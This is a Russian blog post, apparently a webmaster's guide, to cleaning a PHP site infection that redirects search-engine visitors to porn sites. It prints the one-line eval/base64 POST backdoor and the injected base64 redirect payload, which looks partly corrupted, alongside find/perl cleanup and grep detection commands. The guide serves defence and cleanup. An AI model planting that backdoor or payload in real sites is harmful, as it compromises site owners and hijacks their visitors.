Уже довольно давно мучает нас один вирус. Суть его работы во внедрении во все php файлы кода, перебрасывающего пользователей из поисковиков на некие порно-ресурсы. Если же заходить напрямую вбив адрес в адресуню строку, то все открывается без проблем.
Само же заражение происходит через файл post.php или pst.php или какое то другое название, содержащий одну строку
eval (base64_decode(<!-- $_РOST["рhр"] -->));
Этот файл как правило лежит в папке images.
Как понять, что у вас именно этот вирус? Откройте файл index.php в корне сайта и скорее всего в самом начале вы увидете что-то вроде:
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnA Nfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVd FRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddF Ow0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsG KaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwis YmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyR ZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0x cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiEE KSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmt ZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBy vbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3Ryu KCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kE ZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSByy vciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmi ZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3p RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmh VyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiw KSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxv Y2F0aW9uOiBodHRwOi8vbWlua29mLnNlbGxjbGFzc2ljcy5jb20vIik7DQple Gl0KCk7DQp9Cn0KfQ0KfQ0KfQ=="));
Соответственно избавиться от вируса можно прошерстив все файлы и удалив из них данный код.
Можно поступить двумя методами:
Скачать весь сайт на компьютер и, воспользовавшись утилитами типа Text Replacer и ему подобными, удалить всю эту гадость из файлов. Далее закачать все на место
Если есть доступ к SSH, находясь в корне сайта, запустить команду
find . -type f -name '*.php' -exec perl -pi -e 's/eval\(base64_decode\(\"DQp.*KfQ0KfQ==\"\)\)\;//g' '{}' \;
Она найдет все файлы с расширением php и удалит в них искомый вредоносный код
Второй вариант работает очень быстро, но не всем подойдет.
И не забудьте поменять пароль к FTP и админке сайта. Утечка скорее всего происходит через них. Ну и проверить комп на вирусы не помешает тоже.
Ещё одна полезная комбинация команд позволяет искать текст внутри файлов для выявления вируса
find . -type f -name '*.php' -exec grep -l 'искомая строка' {} \;
amiseo.ru